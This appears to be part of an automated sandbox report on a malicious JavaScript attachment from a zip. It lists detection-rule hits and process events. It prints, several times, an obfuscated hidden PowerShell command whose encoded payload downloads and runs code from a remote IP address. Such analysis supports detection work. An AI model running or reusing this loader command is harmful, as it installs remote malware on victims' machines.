    Source: 00000016.00000002.10486540996.000001C92D220000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000002.10204790473.000001AF43145000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10197244915.000001AF43145000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000002.10204512036.000001AF430F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000002.10204700660.000001AF43121000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000002.10487123418.000001C92EAE0000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000003.10471709581.000001C9473AE000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10199822299.000001AF430E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000013.00000003.10199822299.000001AF430E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10199638722.000001AF430D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000013.00000003.10199638722.000001AF430D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000002.10534609217.000001C9473AE000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000003.10471907288.000001C9473AE000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10199404893.000001AF430BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000013.00000003.10199404893.000001AF430BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10197553372.000001AF430B8000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000013.00000003.10197553372.000001AF430B8000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10199569415.000001AF430F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: Process Memory Space: wscript.exe PID: 6608, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: Process Memory Space: powershell.exe PID: 7296, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: C:\Users\user\Documents\20210816\PowerShell_transcript.841675.bhylW44j.20210816191151.txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFA6838233722_2_00007FFA68382337
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFA6838234A22_2_00007FFA6838234A
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation --single-argument C:\Users\user\Desktop\file.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3164 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 /prefetch:8
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js'
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3164 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f0ae1542-f497-484b-a175-a20db09144ba}\InProcServer32Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-611B1A95-1784.pmaJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\aa51ab44-9e09-4433-9d9a-dfd950e743e6.tmpJump to behavior
    Source: classification engineClassification label: mal88.bank.evad.winHTML@48/262@13/10
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ec23d1294499b4ffba61f212cb1217cd\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_02
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.9894395838.0000000004A10000.00000002.00000001.sdmp
    Source: Binary string: omation.pdb source: powershell.exe, 00000016.00000002.10534340939.000001C94736F000.00000004.00000001.sdmp
    Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.9894395838.0000000004A10000.00000002.00000001.sdmp

    Data Obfuscation:

    barindex
    PowerShell case anomaly foundShow sources
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior
    Suspicious powershell command line foundShow sources
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFA6838022D pushad ; iretd 22_2_00007FFA68380231
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFA68383BE5 pushad ; retf 22_2_00007FFA68383BE9
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows DefenderJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
